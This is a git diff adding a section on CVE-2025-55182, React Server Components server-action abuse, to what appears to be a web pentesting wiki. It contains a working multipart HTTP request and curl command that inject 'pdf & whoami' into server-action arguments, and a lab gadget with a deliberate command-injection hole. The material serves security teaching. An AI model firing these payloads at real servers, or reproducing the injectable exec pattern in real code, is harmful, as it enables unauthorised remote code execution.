diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index 85700bee5b1..5a25da381b7 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md @@ -397,6 +397,62 @@ In the following pages you can find information about how to abuse this library - [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/) - [https://hackerone.com/reports/350418](https://hackerone.com/reports/350418) +### React Server Components / react-server-dom-webpack Server Actions Abuse (CVE-2025-55182) + +React Server Components (RSC) rely on `react-server-dom-webpack` (RSDW) to decode server action submissions that are sent as `multipart/form-data`. Each action submission contains: + +- `$ACTION_REF_` parts that reference the action being invoked. +- `$ACTION_:` parts whose body is JSON such as `{"id":"module-path#export","bound":[arg0,arg1,...]}`. + +In version **19.2.0** the `decodeAction(formData, serverManifest)` helper blindly trusts both the **`id` string** (selecting which module export to call) and the **`bound` array** (the arguments). If an attacker can reach the endpoint that forwards requests to `decodeAction`, they can invoke any exported server action with attacker-controlled parameters even without a React front-end (CVE-2025-55182). The end-to-end recipe is: + +1. **Learn the action identifier.** Bundle output, error traces or leaked manifests typically reveal strings like `app/server-actions#generateReport`. +2. **Recreate the multipart payload.** Craft a `$ACTION_REF_0` part and a `$ACTION_0:0` JSON body carrying the identifier and arbitrary arguments. +3. **Let `decodeAction` dispatch it.** The helper resolves the module from `serverManifest`, imports the export, and returns a callable that the server immediately executes. + +Example payload hitting `/formaction`: + +```http +POST /formaction HTTP/1.1 +Host: target +Content-Type: multipart/form-data; boundary=----BOUNDARY + +------BOUNDARY +Content-Disposition: form-data; name="$ACTION_REF_0" + +------BOUNDARY +Content-Disposition: form-data; name="$ACTION_0:0" + +{"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]} +------BOUNDARY-- +``` + +Or with curl: + +```bash +curl -sk -X POST http://target/formaction \ + -F '$ACTION_REF_0=' \ + -F '$ACTION_0:0={"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]}' +``` + +The `bound` array directly populates the server-action parameters. In the vulnerable lab the gadget looks like: + +```javascript +const { exec } = require("child_process"); +const util = require("util"); +const pexec = util.promisify(exec); + +async function generateReport(project, format) { + const cmd = `node ./scripts/report.js --project=${project} --format=${format}`; + const { stdout } = await pexec(cmd); + return stdout; +} +``` + +Supplying `format = "pdf & whoami"` makes `/bin/sh -c` run the legitimate report generator and then `whoami`, with both outputs delivered inside the JSON action response. Any server action that wraps filesystem primitives, database drivers or other interpreters can be abused the same way once the attacker controls the `bound` data. + +An attacker never needs a real React client—any HTTP tool that emits the `$ACTION_*` multipart shape can directly call server actions and chain the resulting JSON output into an RCE primitive. + ## Java - HTTP In Java, **deserialization callbacks are executed during the process of deserialization**. This execution can be exploited by attackers who craft malicious payloads that trigger these callbacks, leading to potential execution of harmful actions. @@ -1193,5 +1249,6 @@ Industrialized gadget discovery: - watchTowr Labs – Is This Bad? This Feels Bad — GoAnywhere CVE-2025-10035: https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-10035/ - [OffSec – CVE-2025-59287 WSUS unsafe deserialization (blog)](https://www.offsec.com/blog/recent-vulnerabilities-in-redis-servers-lua-scripting-engine-2/) - [PoC – tecxx/CVE-2025-59287-WSUS](https://github.com/tecxx/CVE-2025-59287-WSUS) +- [RSC Report Lab – CVE-2025-55182 (React 19.2.0)](https://github.com/ghe770mvp/RSC_Vuln_Lab) {{#include ../../banners/hacktricks-training.md}}